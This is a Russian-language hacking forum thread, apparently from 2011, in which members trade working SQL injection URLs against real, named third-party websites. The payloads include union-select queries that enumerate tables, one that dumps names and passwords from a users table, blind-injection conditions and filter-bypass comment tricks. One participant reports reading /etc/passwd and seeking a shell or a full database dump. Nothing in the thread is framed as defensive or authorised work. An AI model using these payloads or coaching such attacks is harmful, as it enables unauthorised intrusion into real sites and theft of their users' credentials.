Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    13
    Reputations:
    5
    http://www.stanford.edu/group/spatialhistory/cgi-bin/site/page.php?id=-83+union+select+1,2,table_name+from+iNformation_schema.tables+--+
    почему не выводит результат? ошибки тоже нет, в коде смотрел
     
  2. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    хекс хекс хекс
    http://www.stanford.edu/group/spatialhistory/cgi-bin/site/page.php?id=-83+union+select+1,unhex(hex(version())),3--
     
  3. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    13
    Reputations:
    5
    спасибо буду знать
    вот еще blind
    http://www.bispublishers.nl/bookpage.php?id=142+and+ascii(lower(substring(user(),1,1)))<106+--+
    очень мало шарю в слепых, помогите раскрутить, да и ткните плиз носом в фак по слепым, читай несколько... немного не понял
     
  4. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    с чего ты взял что она слепая? вывод в самом низу.
    HTML:
    http://www.bispublishers.nl/bookpage.php?id=-142+union+select+1,2,concat_ws(0x3a,name,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+from+users--
     
  5. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    13
    Reputations:
    5
    Оо фейл! я проверял у меня выводило 48 полей! да и запрос and 1=2 была пустая страница, такое в blind я читал
     
  6. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Во-первых, букву диска писать не надо. Во-вторых, я написал "Возможно, получится читать файлы на сервере. Например так". Все зависит от конкретного сайта, без ссылки нельзя ничего точно сказать.
     
  7. ne0k

    ne0k New Member

    Joined:
    3 Mar 2011
    Messages:
    51
    Likes Received:
    1
    Reputations:
    0
    M_script

    MySQL на дебиане 5.0, какие файлы в принципе возможно прочитать? Пробовал читать все подряд, и /etc/mysql/mysqlaccess.conf и /var/www/index.html (по моему по дефолту присутствует, не?) но ничего кроме /etc/passwd..

    Почитать скрипты обращающиеся к MySQL не могу, мои запросы ведь исполняются на сервере MySQL, как я могу прочитать скрипты лежащие совсем на другом сервере?.. php include нет, ничего нет.. Кроме проклятой скули.. Нужен очень шелл.. Ну или вся БД, блайндом я ее 3 года дампить буду...
     
  8. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    http://forum.antichat.ru/thread49775.html
     
    _________________________
  9. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Кидай посмотрим )
     
    _________________________
  10. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    13
    Reputations:
    5
    на сайте есть sql inj
    подобрал поля с помощью GROUP BY потому что ORDER BY не прокатило
    пробую узнать версию, все равно выдает ошибку, какая то мудреная inj я с такой не сталкивался подскажите
     
  11. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    ссылку в студию
     
  12. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    13
    Reputations:
    5
    http://www.fbskins.com/facebook-layouts/cat.php?id=75
     
  13. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    там могут быть фильтрации, если есть вывод ошибки то попробуй через блинд, а вообще такие вопросы лудше с линками кидать, дабы можно что то было адекватней ответить по ситуации.
     
    _________________________
  14. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    блайнд
    Code:
    http://www.fbskins.com/facebook-layouts/cat.php?id=(75)and(1)=if(mid((select(version())),1,1)=5,1,0)--+
     
    _________________________
    1 person likes this.
  15. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    13
    Reputations:
    5
    http://notice.spacash.com/2257.php?id=-2902+union+select+1,2,3,4,5,6,7,8,9,table_name+from+information_schema.tables+--+

    почему выдает ошибку 500 ?
     
  16. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    http://notice.spacash.com/2257.php?id=-2902+union+select+5,unhex(hex(version())),666,666,666,666,666,666,5,1000--+

    ответ на твой вопрос.
    версия 4+
     
  17. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    зато http://notice.spacash.com/2257.php?id=-2902/*from*/
     
  18. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    попугай, ошибся.
    http://notice.spacash.com/2257.php?id=-2902+union+select+1,2,3,4,5,6,7,8,9,10+--+from
    http://notice.spacash.com/2257.php?id=-2902+union+select+1,2,3,4,5,6,7,8,9,10+--+/*from*/
    http://notice.spacash.com/2257.php?id=-2902+union+select+1,2,3,4,5,6,7,8,9,10+--+frm
    http://notice.spacash.com/2257.php?id=-2902+union+select+1,2,3,4,5,6,7,8,9,10+--+/*frm*/

    http://notice.spacash.com/2257.php?id=-2902/*select+*//*from*/

    upd:
    http://notice.spacash.com/2257.php?id=-2902+union+select/**/1,2,3,4,5,6,7,8,9,10+from+XXX+--+
     
    #17138 M_script, 22 Jun 2011
    Last edited: 22 Jun 2011
  19. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Code:
    notice.spacash.com/2257.php?id=(0)union+select(1),hex(version()),3,4,5,6,7,8,9,(10)from(table)--+
    [upd] не успел чуток )
     
    _________________________
  20. R0nin

    R0nin Member

    Joined:
    11 Jul 2010
    Messages:
    261
    Likes Received:
    24
    Reputations:
    8
    Sql injection на Sybase кто нибудь пробивал?
     
Thread Status:
Not open for further replies.